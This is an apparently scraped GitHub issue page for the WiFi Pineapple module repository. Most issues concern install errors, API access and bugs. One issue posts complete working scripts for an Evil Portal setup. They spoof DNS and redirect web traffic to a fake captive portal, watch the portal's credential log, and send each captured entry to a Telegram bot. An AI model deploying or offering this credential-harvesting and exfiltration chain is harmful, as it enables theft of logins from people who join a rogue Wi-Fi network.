hak5 / pineapple-modules Goto Github PK
View Code? Open in Web Editor NEWThe Official WiFi Pineapple Module Repository for the WiFi Pineapple Mark VII
Home Page: https://wifipineapple.com
The Official WiFi Pineapple Module Repository for the WiFi Pineapple Mark VII
Home Page: https://wifipineapple.com
On latest FW. 1.1.1.
ICS is working through USB
can install dependencies for all current other available modules.
installing dependencies for MTR fails.
No feedback from WEB interface other then notifications in notification bar
Notification is "Unable to install package. 1 May 2022 15:50:39 - Error - mtr"
would be nice to see which dependencies it is trying to install.
or an error message stating what error it is having.
or the location where error logs can be found.
Hi! How can I download a file from /root/handshake to my local drive?
Short story: Send captured credentials to telegram bot
A couple of years ago I made a bash script that helped me do a hot read of a file and every time that file was updated it sent a message from the telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610)
With that idea I molded it to use it in the wifi pineapple and in this way have telegram notifications for red team campaigns.
/root/notify.sh
#!/bin/bash
function urlencode() {
# urlencode <string>
old_lc_collate=$LC_COLLATE
LC_COLLATE=C
local length="${#1}"
for (( i = 0; i < length; i++ )); do
local c="${1:$i:1}"
case $c in
[a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
*) printf '%%%02X' "'$c" ;;
esac
done
LC_COLLATE=$old_lc_collate
}
token="TOKENOFBOT"
id="IDUSER"
if [ "$1" != "" ]; then
if [ ! -t 0 ]; then
msj="$(cat $1)"
fi
else
msj="beep"
fi
msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
echo "Error with bot"
fi
/root/hotreader.sh
#!/bin/bash
file="/www/.logs"
lines=$(cat $file | wc -l)
###while inotifywait -q -e modify $file; do
inotifywait -q -m -e modify $file | while read filename event; do
linesNow=$(cat $file | wc -l)
tail -n $(($linesNow-$lines)) $file > /tmp/out.out && bash /root/notify.sh /tmp/out.out
lines=$linesNow
done
/etc/init.d/evilportal
#!/bin/sh /etc/rc.common
# This is the auto-start script for EvilPortal
START=200
start() {
# Enable ip forward.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Remove old authorized clients list
rm /tmp/EVILPORTAL_CLIENTS.txt
/etc/init.d/php7-fpm start
/etc/init.d/nginx start
# Start DNS MASQ to spoof * for unauthorized clients
dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353
# Symlink evilportal portal api
rm /www/captiveportal
ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal
# Run iptables commands
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
sleep 10
bash /root/hotreader.sh &
}
stop() {
/etc/init.d/php7-fpm stop
/etc/init.d/nginx stop
kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)
rm /www/captiveportal
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}
disable() {
rm /etc/rc.d/*evilportal
kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}
I would like to work more but I'm not very good at developing web applications
Notes:
I know there are ways Iโm just trying to figure out the right one to use when associating the Wi-Fi pineapple with these other methods what tools are available
Does dns spoofing support now?
I think this is a useful function
The Evil WPA AP issues IP addresses in the range of 172.16.42.100. Once a client connects and authorizes through the Evil Portal the NAT assignment to allow the client past the Captive Portal is added and causes this check to always return true.
This prevents the Evil Portal service from being recognized as successfully stopped and also prevents it from being restarted.
I'm developing some new modules for the Pineapple MK7, and I want to use some of the APIs from the python backend itself. However system does not include the requests
library and it's really cumbersome to use urllib.requests.
Another problem, authentication. Even if we use the urllib.requests, there is no authentication so I can't access any of the APIs.
Specific API I was interested is pineap/handshakes.
I believe it is fundamental that backend is able to query some information from the pineapple service.
Thanks
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.